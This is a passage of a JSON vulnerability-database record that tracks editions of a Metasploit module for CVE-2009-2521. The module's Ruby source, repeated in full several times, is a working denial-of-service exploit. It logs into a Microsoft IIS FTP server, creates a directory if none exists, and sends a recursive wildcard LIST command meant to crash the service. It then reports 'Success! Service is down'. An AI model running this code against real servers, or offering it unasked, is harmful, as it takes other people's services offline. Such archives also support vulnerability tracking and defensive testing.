\"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-08-25T19:36:43", "differentElements": ["modified", "published"], "edition": 45}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-08-31T21:43:50", "history": [], "viewCount": 65, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-08-31T21:43:50", "differentElements": ["modified", "published"], "edition": 46}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "06553b862fc3034191c52a9cc2c2982b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-08-31T23:51:15", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-08-31T23:51:15", "differentElements": ["modified", "published"], "edition": 47}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "20c45a17c1d36c44165e93a37a65b81f", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-09-23T19:26:27", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-09-23T19:26:27", "differentElements": ["modified", "published"], "edition": 48}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "06553b862fc3034191c52a9cc2c2982b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-09-23T21:26:29", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-09-23T21:26:29", "differentElements": ["sourceData"], "edition": 49}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "7bd7400596b30d53c7d0d8a4f1d8d465", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-09-24T19:08:02", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-09-24T19:08:02", "differentElements": ["sourceData"], "edition": 50}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "06553b862fc3034191c52a9cc2c2982b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-09-24T19:22:37", "history": [], "viewCount": 101, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12477", "SSV:12236"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2018-09-24T19:22:37"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-09-24T19:22:37", "differentElements": ["modified", "published"], "edition": 51}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "20c45a17c1d36c44165e93a37a65b81f", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-03-24T11:42:50", "history": [], "viewCount": 101, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12477", "SSV:12236"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-03-24T11:42:50"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was 